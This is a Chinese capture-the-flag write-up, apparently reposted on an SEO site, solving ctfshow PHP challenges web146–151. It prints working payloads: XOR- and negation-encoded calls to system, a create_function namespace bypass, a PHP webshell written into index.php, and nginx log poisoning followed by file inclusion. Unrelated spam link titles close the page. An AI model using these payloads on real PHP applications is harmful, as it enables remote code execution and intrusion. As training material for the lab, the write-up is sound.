当前位置: 首页 > news >正文

网站开发工资山东企业网站设计方案书

网站开发工资山东,企业网站设计方案书,百度推广竞价开户,上饶市住房城乡建设局网站1.web146 :被过滤了,三元运算符用不了,还可以用位运算符,逻辑运算符,等,逻辑运算符要注意或运算符的短路性 eval(return 1|phpinfo()|1) eval(return 1phpinfo()|1) payload: v11&v20&v3(~%8C%86%8C%8B%9A%92…

1.web146

在这里插入图片描述
:被过滤了,三元运算符用不了,还可以用位运算符,逻辑运算符,=等,逻辑运算符要注意或运算符的短路性
eval(return 1|phpinfo()|1)
eval(return 1==phpinfo()|1)
payload:

v1=1&v2=0&v3===(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%D5)|
v1=1&v2=0&v3=|(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%D5)|

2.web147

在这里插入图片描述
匹配不是以字母开头的字符串 ,create_funciton的用法,需要在前面加一个字符绕过正则,达到命令执行
%5c()可以绕过正则
php里默认命名空间是\,所有原生函数和类都在这个命名空间中。 普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路 径; 而如果写\function_name()这样调用函数,则其实是写了一个绝对路径。 如果你在其他namespace里调用系统类,就必须写绝对路径这种写 法

create_function('$a','echo $a."123"')
类似于
function f($a) {echo $a."123";
}

payload:

GET ?show=;};system('cat f*');//
POST ctf=%5ccreate_function

3.web148

在这里插入图片描述
异或符号和括号没被过滤可以用异或运算绕过,还可以用中文绕过,其实还是异或运算
用羽师傅脚本生成payload
payload:

1.
("%08%02%08%09%05%0d"^"%7b%7b%7b%7d%60%60")("%03%01%09%01%06%02"^"%60%60%7d%21%60%28");2.
code=$哈="`{{{"^"?<>/";${$哈}[哼](${$哈}[嗯]);&哼=system&嗯=tac f*
其实也是利用异或构造
"`{{{"^"?<>/"; 异或出来的结果是 _GET

4.web149

在这里插入图片描述
预期条件竞争

ctf=1.php
show=<?php system('tac /c*';)?>

burp 抓包发送到intruder 一个不断发送上面数据 位置不设 payload 设为null 另一个不断访问1.php
在这里插入图片描述
非预期

ctf=index.php
show=<?php eval($_POST[1]);?>

5.web150

在这里插入图片描述
strrpos查找最后出现的位置,没有为flase 先算后面===,为true,要想包含只能时isVIP为true
extract导入当前符号表,也就是变量覆盖
$_SERVER [‘QUERY_STRING’] 表示获取get和post 中的参数和值
isVIP和上面类中的函数没关系
payload

ua <?php eval($_POST[1])?>get  isVIP=TRUE
post  ctf=/var/log/nginx/access.log&1=system('cat f*');

6.web151

在这里插入图片描述

__autoload的函数在不在ctfshow类中
__autoload加载未定义的类,即进行类函数判断时会调用这个函数
__autoload函数会执行这个变量class
需要先构造__CTFSHOW__但是_被过滤了,.可以绕过,构造了这个变量
…CTFSHOW…,需要进行传值,因为原先并没有,而extract函数可以覆盖原先的变量,就变为了$CTFSHOW=phpinfo,class变量就是__ctfshow__变量,class的值为phpinfo,最后就会执行phpinfo

flag在phpinfo中

__autoload — 尝试加载未定义的类
最后构造?..CTFSHOW…=phpinfo就可以看到phpinfo信息啦
原因是…CTFSHOW…解析变量成__CTFSHOW__然后进行了变量覆盖,因为CTFSHOW是类就会使用
__autoload()函数方法,去加载,因为等于phpinfo就会去加载phpinfo
接下来就去getshell啦
payload:

get
..CTFSHOW..=phpinfo

参考文章

http://www.15wanjia.com/news/182591.html

相关文章:

  • 纺织品东莞网站建设超炫网站
  • 网站建设思路常州网站公司怎么选
  • 做网站的文案十里河网站建设公司
  • o2o电子商务网站建设百度搜索指数1000是什么
  • 网站建站网站jp586 vip网站的发展历史
  • 网站模板编号佛山建设外贸网站
  • 广州优化网站网站地图插件
  • 域名备案中网站负责人临沂网站建设对实体企业的重要性
  • 新网站如何做百度收录WordPress英文网站
  • 成都网站建设技术外包英文seo招聘
  • 一流的学校网站建设ui设计培训平台
  • 做网站找王思奇做响应式网站的常用尺寸
  • 广州市网站建设服务机构西安做网站公司哪家好
  • 网站建设上机课网站开发和程序开发的却别
  • 番禺 网站建设共享网站哪里建
  • php网站建设思路四川建设网官网app
  • 南通优化网站公司哪家好做班级相册网站的目的意义
  • 不备案网站怎么做淘宝客wordpress文章评论设置
  • 营销优化型网站怎么做沈阳 教育 公司 网站建设
  • 做搞机网站大连网站关键词
  • 黄浦网站推广公司网站改了模板被百度降权
  • 做公众号链接的网站wordpress 百度搜索
  • 商城网站大概多少钱电商平台有哪些企业
  • 京东网站网站建设是什么wordpress display_name
  • 网站推广计划的内容自己创建一个app要多少钱
  • 棋牌论坛网站怎么做网站建设logo图片
  • 网站建设提示DNA错误dede查看网站
  • 企业自己建网站怎么建html代码大全表格
  • 免费网站源码建站系统华为手机官网商城
  • 做个人网站需要哪些4c网络营销策略